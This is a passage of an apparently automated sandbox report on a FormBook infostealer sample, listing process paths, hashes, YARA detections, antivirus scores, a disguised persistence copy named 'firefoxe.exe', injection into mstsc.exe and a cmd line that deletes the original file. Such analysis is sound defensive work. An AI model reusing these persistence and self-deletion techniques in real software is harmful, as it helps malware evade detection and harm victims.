                                        Path:C:\Users\user\Desktop\kayx.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\kayx.exe
                                        Imagebase:0x400000
                                        File size:432640 bytes
                                        MD5 hash:A80E73A824B655491F54278B7A29467D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:16:32:49
                                        Start date:20/11/2020
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:
                                        Imagebase:0x7ff714890000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:16:32:52
                                        Start date:20/11/2020
                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
                                        Imagebase:0x9a0000
                                        File size:432640 bytes
                                        MD5 hash:A80E73A824B655491F54278B7A29467D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 46%, ReversingLabs
                                        Reputation:low

                                        General

                                        Start time:16:33:00
                                        Start date:20/11/2020
                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
                                        Imagebase:0x3e0000
                                        File size:432640 bytes
                                        MD5 hash:A80E73A824B655491F54278B7A29467D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:low

                                        General

                                        Start time:16:33:05
                                        Start date:20/11/2020
                                        Path:C:\Windows\SysWOW64\mstsc.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\mstsc.exe
                                        Imagebase:0x3f0000
                                        File size:3444224 bytes
                                        MD5 hash:2412003BE253A515C620CE4890F3D8F3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        General

                                        Start time:16:33:08
                                        Start date:20/11/2020
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\Users\user\Desktop\kayx.exe'
                                        Imagebase:0xbd0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:16:33:09
                                        Start date:20/11/2020
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6b2800000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis

                                        Reset < >